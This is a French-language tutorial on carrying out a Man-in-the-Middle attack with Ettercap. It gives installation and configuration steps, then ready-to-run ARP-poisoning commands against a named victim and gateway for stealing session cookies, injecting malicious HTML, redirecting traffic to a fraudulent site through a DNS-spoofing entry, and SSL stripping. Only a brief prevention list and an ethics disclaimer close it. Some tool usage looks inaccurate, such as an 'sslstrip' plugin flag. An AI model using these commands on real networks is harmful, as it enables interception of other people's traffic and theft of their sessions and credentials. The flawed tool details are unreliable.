Introduction
Ce tutoriel explique comment effectuer une attaque Man-in-the-Middle (MITM) en utilisant l'outil Ettercap. L'objectif d'une attaque MITM est d'intercepter et de manipuler le trafic réseau entre deux parties. Nous verrons comment configurer et lancer une attaque MITM, ainsi que des exemples concrets et des techniques avancées.
Étape 1: Comprendre les Attaques MITM
Les attaques MITM permettent à un attaquant d'intercepter et de manipuler les communications entre deux parties sans qu'elles en soient conscientes. Cela peut permettre de voler des informations sensibles, d'injecter du code malveillant, ou de rediriger les victimes vers des sites frauduleux. Voici les étapes générales d'une attaque MITM :
- ARP Spoofing: L'attaquant envoie des réponses ARP falsifiées pour se faire passer pour la passerelle réseau.
- Interception du Trafic: L'attaquant intercepte et surveille le trafic réseau.
- Manipulation du Trafic: L'attaquant peut injecter ou modifier des données dans les communications interceptées.
Étape 2: Installation d'Ettercap
Ettercap est un outil open-source utilisé pour les attaques MITM. Voici comment l'installer :
sudo apt-get update && sudo apt-get upgrade
sudo apt-get install ettercap-graphical
Étape 3: Configuration d'Ettercap
Une fois Ettercap installé, configurez-le pour lancer une attaque MITM :
- Ouvrez Ettercap en mode graphique :
sudo ettercap -G - Sélectionnez "Sniff" dans le menu, puis "Unified Sniffing".
- Choisissez l'interface réseau à utiliser (e.g., eth0).
- Ajoutez les cibles :
- Cible 1 : L'adresse IP de la victime.
- Cible 2 : L'adresse IP de la passerelle réseau.
- Sélectionnez "Mitm" dans le menu, puis "ARP poisoning".
- Cochez "Sniff remote connections" et cliquez sur "OK".
Exemple de configuration :
Interface: eth0
Cible 1: 192.168.1.5 (Victime)
Cible 2: 192.168.1.1 (Passerelle)
Étape 4: Lancer l'Attaque MITM
Une fois configuré, démarrez l'attaque en cliquant sur "Start" dans le menu principal. Ettercap commencera à intercepter et à manipuler le trafic entre les cibles.
Exemples Pratiques
Voici trois exemples pratiques pour illustrer l'utilisation d'Ettercap dans des scénarios d'attaque MITM :
Exemple 1: Vol de Cookies de Session
Interceptez les cookies de session d'une victime en surveillant le trafic HTTP non sécurisé :
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.5// /192.168.1.1//
Analysez les paquets interceptés pour extraire les cookies de session :
sudo wireshark
Exemple 2: Injection de Code HTML Malveillant
Injectez du code HTML malveillant dans les pages web visitées par la victime :
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.5// /192.168.1.1// -P dns_spoof
Utilisez un plugin DNS spoofing pour rediriger la victime vers une page contenant du code HTML malveillant.
Exemple 3: Redirection du Trafic vers un Faux Site Web
Redirigez le trafic de la victime vers un site web frauduleux en utilisant le plugin dns_spoof :
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.5// /192.168.1.1// -P dns_spoof
Modifiez le fichier /etc/ettercap/etter.dns pour rediriger les requêtes DNS :
*.example.com A 192.168.1.100
où 192.168.1.100 est l'adresse IP du site web frauduleux.
Techniques Avancées d'Exploitation MITM
Pour rendre l'attaque plus efficace, vous pouvez utiliser des techniques avancées telles que :
- SSL Stripping: Dégradez les connexions HTTPS en HTTP pour intercepter les données sensibles.
- DNS Spoofing: Redirigez les requêtes DNS vers des sites contrôlés par l'attaquant.
- Ettercap Plugins: Utilisez des plugins Ettercap pour des attaques spécifiques comme
dns_spoof,autoadd, etcollect_http.
Exemple de SSL Stripping :
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.5// /192.168.1.1// -P sslstrip
Mesures de Prévention
Pour se protéger contre les attaques MITM, envisagez les mesures suivantes :
- Utilisation de HTTPS pour chiffrer les communications.
- Mise en place d'une authentification mutuelle TLS.
- Utilisation de VPN pour sécuriser le trafic réseau.
- Activation des fonctionnalités de protection contre les attaques MITM dans les routeurs et les pare-feu.
- Surveillance continue du réseau pour détecter les activités suspectes.
Conclusion
Ce tutoriel vous a montré comment effectuer une attaque Man-in-the-Middle (MITM) en utilisant Ettercap. Rappelez-vous, ces informations doivent être utilisées de manière éthique et légale. L'objectif est de sensibiliser aux dangers des attaques MITM et de renforcer la sécurité des réseaux.